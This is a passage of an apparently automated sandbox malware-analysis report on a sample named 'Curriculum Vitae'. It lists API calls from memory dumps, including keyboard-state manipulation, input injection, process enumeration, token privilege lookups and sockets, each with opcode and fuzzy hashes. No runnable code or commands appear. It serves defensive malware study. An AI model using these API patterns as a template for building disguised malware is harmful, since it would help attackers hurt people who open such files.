                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Menu$InfoItem$Draw
                      • String ID: 0
                      • API String ID: 3227129158-4108050209
                      • Opcode ID: a7a2fb5ee1675391cca0608d98d21431dc40982dbffdd202e5b95e95b647833e
                      • Instruction ID: 4c62a02ec9077974759f0fa3360c8fa783e6f1bdae04a43224307fba41c958e5
                      • Opcode Fuzzy Hash: a7a2fb5ee1675391cca0608d98d21431dc40982dbffdd202e5b95e95b647833e
                      • Instruction Fuzzy Hash: 04015B3151021AEFDB219F11EC44FAEBBB8FB45361F1480A9F949D6261DB309A85DF31
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 061bad8f35c7b1f2d8e0a19acfdd98253492505a7c57795b6de17c7f2bdf49a8
                      • Instruction ID: 34075b9fb1db26d24bd277a555d7fc3d827329f5db789dfedb7c176a3c54a3c6
                      • Opcode Fuzzy Hash: 061bad8f35c7b1f2d8e0a19acfdd98253492505a7c57795b6de17c7f2bdf49a8
                      • Instruction Fuzzy Hash: B0C17C75A00216EFCB14DFA8D894EAEBBB5FF48704F248598E905EB251D731ED41CBA0
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Variant$ClearInitInitializeUninitialize
                      • String ID:
                      • API String ID: 1998397398-0
                      • Opcode ID: db775bdc528925eef7d435f13060e5f608220b97e21f48e8946bf6d7cfd0d3f1
                      • Instruction ID: ad279e355e404b381693adaf4e3beebde8ef7c3495218dc506c0ebc925e88b45
                      • Opcode Fuzzy Hash: db775bdc528925eef7d435f13060e5f608220b97e21f48e8946bf6d7cfd0d3f1
                      • Instruction Fuzzy Hash: AEA11575604601DFCB14DF29C485A6AB7E5FF88714F048859F98A9B362DB30EE01DBB1
                      APIs
                      • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D905F0
                      • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D90608
                      • CLSIDFromProgID.OLE32(?,?,00000000,00DCCC40,000000FF,?,00000000,00000800,00000000,?,00DCFC08,?), ref: 00D9062D
                      • _memcmp.LIBVCRUNTIME ref: 00D9064E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: FromProg$FreeTask_memcmp
                      • String ID:
                      • API String ID: 314563124-0
                      • Opcode ID: 213f76d7e962ac2c161264cc6145b893999dbb1a4995cfc63c2c5b42d23e91ba
                      • Instruction ID: 032f29d55b103af352b2d66c26ab3c95ce13c91b88804c4649dbf0d08d9ad0c5
                      • Opcode Fuzzy Hash: 213f76d7e962ac2c161264cc6145b893999dbb1a4995cfc63c2c5b42d23e91ba
                      • Instruction Fuzzy Hash: F281E875A00209EFCF04DF94C984EEEBBB9FF89315F244558E516AB250DB71AE06CB60
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: _free
                      • String ID:
                      • API String ID: 269201875-0
                      • Opcode ID: 349525abb8ab55e7304e16a0ceec4928c235da1ddbd68d707940d9f92725630b
                      • Instruction ID: 62c08f4c0648c2fa88c1e4e12a43e97a13903799374c814ac43495cf836eab94
                      • Opcode Fuzzy Hash: 349525abb8ab55e7304e16a0ceec4928c235da1ddbd68d707940d9f92725630b
                      • Instruction Fuzzy Hash: 96416C79A00210ABDF256BFC9C46ABE3AA5EF41374F28C325FC1DD7291F63488415271
                      APIs
                      • GetWindowRect.USER32(016F0828,?), ref: 00DC62E2
                      • ScreenToClient.USER32(?,?), ref: 00DC6315
                      • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00DC6382
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$ClientMoveRectScreen
                      • String ID:
                      • API String ID: 3880355969-0
                      • Opcode ID: 648d3d4331863cfdeb37da7b80e17bdb563dcbb7e6afb538cd9dcbc4ce350d30
                      • Instruction ID: 6cc86ea56d0680463f1dea4b6bb00ef956058b8f4936eabd79e25c2ed7ee28bc
                      • Opcode Fuzzy Hash: 648d3d4331863cfdeb37da7b80e17bdb563dcbb7e6afb538cd9dcbc4ce350d30
                      • Instruction Fuzzy Hash: B2512C74A0024AEFCB10DF68D980EAE7BB5EF85360F18815DF9159B2A0D731ED81CB60
                      APIs
                      • socket.WSOCK32(00000002,00000002,00000011), ref: 00DB1AFD
                      • WSAGetLastError.WSOCK32 ref: 00DB1B0B
                      • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00DB1B8A
                      • WSAGetLastError.WSOCK32 ref: 00DB1B94
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                       • Associated: 00000000.00000002.2110719919.0000000000D30000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DCC000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110788518.0000000000DF2000.00000002.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110846155.0000000000DFC000.00000004.00000001.01000000.00000003.sdmp
                       • Associated: 00000000.00000002.2110863014.0000000000E04000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ErrorLast$socket
                      • String ID:
                      • API String ID: 1881357543-0
                      • Opcode ID: d6fcd2235bfb244aebe3dc77ca0f055cd85bc77789723d49f38fec4987e6b106
                      • Instruction ID: e9fa76907b6e56d723d67749de2d058f8855024d0d57f2a495b3c1207156597a
                      • Opcode Fuzzy Hash: d6fcd2235bfb244aebe3dc77ca0f055cd85bc77789723d49f38fec4987e6b106
                      • Instruction Fuzzy Hash: BB41A078600200AFE720AF24C886F667BE5EB45718F588448FA1A9F3D2D672DD41CBB0
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7985764fbfdb1736019c6217de67a360c44d5d7d1c7c9ebb0f0189be69bb9b19
                      • Instruction ID: 4d8b33b693b9483532078c6dd6b2ff82a7f001143bad82afbf0c7f242f10752b
                      • Opcode Fuzzy Hash: 7985764fbfdb1736019c6217de67a360c44d5d7d1c7c9ebb0f0189be69bb9b19
                      • Instruction Fuzzy Hash: 20412B75A00714BFD724AF38CC41BAA7BE9EB84720F10852BF546DB291D771A94187B0
                      APIs
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00DA5783
                      • GetLastError.KERNEL32(?,00000000), ref: 00DA57A9
                      • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00DA57CE
                      • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00DA57FA
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateHardLink$DeleteErrorFileLast
                      • String ID:
                      • API String ID: 3321077145-0
                      • Opcode ID: 7b2d8f89ac3de9bea857a0d4ed5780a29f5342ea3c15d6fd21f751b097ffae46
                      • Instruction ID: 93b608ebd442c8c0baebd04384c0a11794c161d24b4c161543f98da3c1982e99
                      • Opcode Fuzzy Hash: 7b2d8f89ac3de9bea857a0d4ed5780a29f5342ea3c15d6fd21f751b097ffae46
                      • Instruction Fuzzy Hash: E9410C39600A15DFCB25DF15C544A59BBE2EF89320F198488E94AAB362CB34FD41CBB1
                      APIs
                      • MultiByteToWideChar.KERNEL32(?,00000000,8BE85006,00D56D71,00000000,00000000,00D582D9,?,00D582D9,?,00000001,00D56D71,8BE85006,00000001,00D582D9,00D582D9), ref: 00D6D910
                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00D6D999
                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00D6D9AB
                      • __freea.LIBCMT ref: 00D6D9B4
                        • Part of subcall function 00D63820: RtlAllocateHeap.NTDLL(00000000,?,00E01444,?,00D4FDF5,?,?,00D3A976,00000010,00E01440,00D313FC,?,00D313C6,?,00D31129), ref: 00D63852
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                      • String ID:
                      • API String ID: 2652629310-0
                      • Opcode ID: 623799092d70011e3029f7b3b55bd597f4de88a01cd6e5f3c41c55b26dd53ebc
                      • Instruction ID: b99e208803a936a12cb467d27d3ecb856541d73f09a98cddd672f5a4d47085ca
                      • Opcode Fuzzy Hash: 623799092d70011e3029f7b3b55bd597f4de88a01cd6e5f3c41c55b26dd53ebc
                      • Instruction Fuzzy Hash: 7931BC72A0020AABDF24DF65EC45EAF7BA6EB41310B094269FC08D7250EB35CD54CBB0
                      APIs
                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00DC5352
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC5375
                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00DC5382
                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00DC53A8
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: LongWindow$InvalidateMessageRectSend
                      • String ID:
                      • API String ID: 3340791633-0
                      • Opcode ID: 1a53edd0e7babe9cd4f06d53e9f9ff930acb30946596fe1468d23eaa59ceed6f
                      • Instruction ID: b6d35ba01565dea2e0886ebefd1c2c423b476705907ab08b49364731489db208
                      • Opcode Fuzzy Hash: 1a53edd0e7babe9cd4f06d53e9f9ff930acb30946596fe1468d23eaa59ceed6f
                      • Instruction Fuzzy Hash: 5A31F230B55A8AEFEB309A54EC05FE83761AB04390F5C410AFA51972E5C7B1B9C09B71
                      APIs
                      • GetKeyboardState.USER32(?,75A8C0D0,?,00008000), ref: 00D9ABF1
                      • SetKeyboardState.USER32(00000080,?,00008000), ref: 00D9AC0D
                      • PostMessageW.USER32(00000000,00000101,00000000), ref: 00D9AC74
                      • SendInput.USER32(00000001,?,0000001C,75A8C0D0,?,00008000), ref: 00D9ACC6
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: KeyboardState$InputMessagePostSend
                      • String ID:
                      • API String ID: 432972143-0
                      • Opcode ID: 6943bb8ae39a7bf104e10ac441b032bebc28654b04faaba617885309e8a77d3c
                      • Instruction ID: 8b9464ddee89c3034d70bef1dc67c10e5a8dac5f78b7ddb7f5088da1774f470f
                      • Opcode Fuzzy Hash: 6943bb8ae39a7bf104e10ac441b032bebc28654b04faaba617885309e8a77d3c
                      • Instruction Fuzzy Hash: 39313736A403196FEF34CB6D8C04BFA7BA5AB89311F08471AE4859B2D0C374898187F2
                      APIs
                      • ClientToScreen.USER32(?,?), ref: 00DC769A
                      • GetWindowRect.USER32(?,?), ref: 00DC7710
                      • PtInRect.USER32(?,?,00DC8B89), ref: 00DC7720
                      • MessageBeep.USER32(00000000), ref: 00DC778C
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Rect$BeepClientMessageScreenWindow
                      • String ID:
                      • API String ID: 1352109105-0
                      • Opcode ID: 7a11634fc036dbab91c40110379bb3b497044d7bb03a5008fa19a96e79ef8e40
                      • Instruction ID: b70e709497948cdde3d9d780c0bc92ac661a52c1869fbb1272f6b5633e001a6c
                      • Opcode Fuzzy Hash: 7a11634fc036dbab91c40110379bb3b497044d7bb03a5008fa19a96e79ef8e40
                      • Instruction Fuzzy Hash: CA417C3460521A9FCB01CF69C894FA977F5FB49314F1941ACE514AB2A1C731E986CFA0
                      APIs
                      • GetForegroundWindow.USER32 ref: 00DC16EB
                        • Part of subcall function 00D93A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00D93A57
                        • Part of subcall function 00D93A3D: GetCurrentThreadId.KERNEL32 ref: 00D93A5E
                        • Part of subcall function 00D93A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00D925B3), ref: 00D93A65
                      • GetCaretPos.USER32(?), ref: 00DC16FF
                      • ClientToScreen.USER32(00000000,?), ref: 00DC174C
                      • GetForegroundWindow.USER32 ref: 00DC1752
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                      • String ID:
                      • API String ID: 2759813231-0
                      • Opcode ID: f22de12c006f5959d3641cead01e38f13d4cd72e26c1fa5a6b8c4a3eda1344cb
                      • Instruction ID: a1f931b36f24f7a60907c100ce80a34436e212a7ae8dd1a3b3e89a74f6090f17
                      • Opcode Fuzzy Hash: f22de12c006f5959d3641cead01e38f13d4cd72e26c1fa5a6b8c4a3eda1344cb
                      • Instruction Fuzzy Hash: 2D313075D10249AFCB04EFA9C881DAEB7F9EF49304B5480A9E415E7252D631DE45CFB0
                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32 ref: 00D9D501
                      • Process32FirstW.KERNEL32(00000000,?), ref: 00D9D50F
                      • Process32NextW.KERNEL32(00000000,?), ref: 00D9D52F
                      • CloseHandle.KERNEL32(00000000), ref: 00D9D5DC
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                      • String ID:
                      • API String ID: 420147892-0
                      • Opcode ID: ef3df758a9208b099acd459ba7f7c91b6873b6f86d4682f503b03e06909742a6
                      • Instruction ID: da77e36a9ffef18f0213b89868a968974f97b3ab3bba286be7b98f789b550a46
                      • Opcode Fuzzy Hash: ef3df758a9208b099acd459ba7f7c91b6873b6f86d4682f503b03e06909742a6
                      • Instruction Fuzzy Hash: 05319F711083019FD700EF64C891AAFBBE8EF99354F58092DF585862A1EB719949CBB2
                      APIs
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      • GetCursorPos.USER32(?), ref: 00DC9001
                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00D87711,?,?,?,?,?), ref: 00DC9016
                      • GetCursorPos.USER32(?), ref: 00DC905E
                      • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00D87711,?,?,?), ref: 00DC9094
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Cursor$LongMenuPopupProcTrackWindow
                      • String ID:
                      • API String ID: 2864067406-0
                      • Opcode ID: b3079c45e2921ba91e687d891f40323b88d62ed2292dadda6849c92f75005c30
                      • Instruction ID: 771779d2cd32bb8302b653d5ac6ef855a12c8b0946127858a42702d6144e29dd
                      • Opcode Fuzzy Hash: b3079c45e2921ba91e687d891f40323b88d62ed2292dadda6849c92f75005c30
                      • Instruction Fuzzy Hash: 9521A135610119EFCB258F95CC68FFABBB9EF89350F044159F9059B261C3319990EB70
                      APIs
                      • GetFileAttributesW.KERNEL32(?,00DCCB68), ref: 00D9D2FB
                      • GetLastError.KERNEL32 ref: 00D9D30A
                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 00D9D319
                      • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00DCCB68), ref: 00D9D376
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: CreateDirectory$AttributesErrorFileLast
                      • String ID:
                      • API String ID: 2267087916-0
                      • Opcode ID: 1ad99a4d15d17a23913ede7014f39fa4634d2d01ce16de05207af6ce1d57e415
                      • Instruction ID: c87f86b5a8d9c846cf3c66f0b4d19112a025ec0297da01f75e4c2c49a2616169
                      • Opcode Fuzzy Hash: 1ad99a4d15d17a23913ede7014f39fa4634d2d01ce16de05207af6ce1d57e415
                      • Instruction Fuzzy Hash: DC21A170508302DF8B00DF68C88186AB7E5EF56365F544A1DF499C32A1D730D94ACBB3
                      APIs
                        • Part of subcall function 00D91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00D9102A
                        • Part of subcall function 00D91014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00D91036
                        • Part of subcall function 00D91014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91045
                        • Part of subcall function 00D91014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00D9104C
                        • Part of subcall function 00D91014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00D91062
                      • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00D915BE
                      • _memcmp.LIBVCRUNTIME ref: 00D915E1
                      • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00D91617
                      • HeapFree.KERNEL32(00000000), ref: 00D9161E
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                      • String ID:
                      • API String ID: 1592001646-0
                      • Opcode ID: aa0eb1d61e919c3bbdaeb7145c237770df110134ea4c5fb7f798a6f14ecf8ef4
                      • Instruction ID: c23dc10379f37ea5a0443a8b36cabc4edfc0513237dc5b745012ee59161be473
                      • Opcode Fuzzy Hash: aa0eb1d61e919c3bbdaeb7145c237770df110134ea4c5fb7f798a6f14ecf8ef4
                      • Instruction Fuzzy Hash: D0219A36E4020AEFDF10DFA4C945BEEB7B8EF44344F094459E445AB241E730AA05CBB0
                      APIs
                      • GetWindowLongW.USER32(?,000000EC), ref: 00DC280A
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DC2824
                      • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00DC2832
                      • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00DC2840
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long$AttributesLayered
                      • String ID:
                      • API String ID: 2169480361-0
                      • Opcode ID: 73f7377ac3b6c0de5035b25a9f4791b876b4430f0174ff0c41783219dbff99ac
                      • Instruction ID: 2c242f66737b1a5623068a2bfabd24bfb8edd8e27898d3a0fca7c02d812d0a28
                      • Opcode Fuzzy Hash: 73f7377ac3b6c0de5035b25a9f4791b876b4430f0174ff0c41783219dbff99ac
                      • Instruction Fuzzy Hash: 9F21B231214612AFD7149B24C884F7A77A5EF45324F14815CF516CB6E2C771EC42C7B0
                      APIs
                        • Part of subcall function 00D98D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,00D9790A,?,000000FF,?,00D98754,00000000,?,0000001C,?,?), ref: 00D98D8C
                        • Part of subcall function 00D98D7D: lstrcpyW.KERNEL32(00000000,?), ref: 00D98DB2
                        • Part of subcall function 00D98D7D: lstrcmpiW.KERNEL32(00000000,?,00D9790A,?,000000FF,?,00D98754,00000000,?,0000001C,?,?), ref: 00D98DE3
                      • lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00D98754,00000000,?,0000001C,?,?,00000000), ref: 00D97923
                      • lstrcpyW.KERNEL32(00000000,?), ref: 00D97949
                      • lstrcmpiW.KERNEL32(00000002,cdecl,?,00D98754,00000000,?,0000001C,?,?,00000000), ref: 00D97984
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: lstrcmpilstrcpylstrlen
                      • String ID: cdecl
                      • API String ID: 4031866154-3896280584
                      • Opcode ID: 1d3d9de138076918a2c839991159ae01ebd00c7329bdaf8b2d57843eace93bea
                      • Instruction ID: 319a045e0b44ff3f3a1b2ec6c97f6bf75ff333c72ed7e7936f96133eda325b6b
                      • Opcode Fuzzy Hash: 1d3d9de138076918a2c839991159ae01ebd00c7329bdaf8b2d57843eace93bea
                      • Instruction Fuzzy Hash: 8211E13A210302AFCF159F35D844E7A77A9FF85350B14402AF946CB2A4EB319801CBB1
                      APIs
                      • GetWindowLongW.USER32(?,000000F0), ref: 00DC7D0B
                      • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00DC7D2A
                      • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00DC7D42
                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DAB7AD,00000000), ref: 00DC7D6B
                        • Part of subcall function 00D49BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00D49BB2
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: Window$Long
                      • String ID:
                      • API String ID: 847901565-0
                      • Opcode ID: 426aeab8f4798e9404f841a60935375e3d7ea54f9c5853c765c9663a9c840f10
                      • Instruction ID: 01388d6506172ebd56bac9ead953922e98cbd5c60618585afff692998d514733
                      • Opcode Fuzzy Hash: 426aeab8f4798e9404f841a60935375e3d7ea54f9c5853c765c9663a9c840f10
                      • Instruction Fuzzy Hash: 60119031614616AFCB109F29DC04FA63BA5AF45360F154728F93ADB2F0D7319991CF60
                      APIs
                      • SendMessageW.USER32(?,00001060,?,00000004), ref: 00DC56BB
                      • _wcslen.LIBCMT ref: 00DC56CD
                      • _wcslen.LIBCMT ref: 00DC56D8
                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00DC5816
                      Memory Dump Source
                      • Source File: 00000000.00000002.2110737784.0000000000D31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D30000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_d30000_Curriculum Vitae.jbxd
                      Similarity
                      • API ID: MessageSend_wcslen
                      • String ID:
                      • API String ID: 455545452-0
                      • Opcode ID: 378bcc4de598e99c004729336d4062d7bb764073be95bfae1a6585bc268e908e
                      • Instruction ID: e34e24bd7d1b50b62ffe666e139f3d6e57275022d46a88b2791c407d762d4e54
                      • Opcode Fuzzy Hash: 378bcc4de598e99c004729336d4062d7bb764073be95bfae1a6585bc268e908e
                      • Instruction Fuzzy Hash: 9511CD3164060A96DF209B61AC85FEE37ACEB11364B14406EF955D7085EB70EAC58F70
                      APIs
                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00D91A47
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A59
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A6F
                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00D91A8A
                      Memory Dump Source
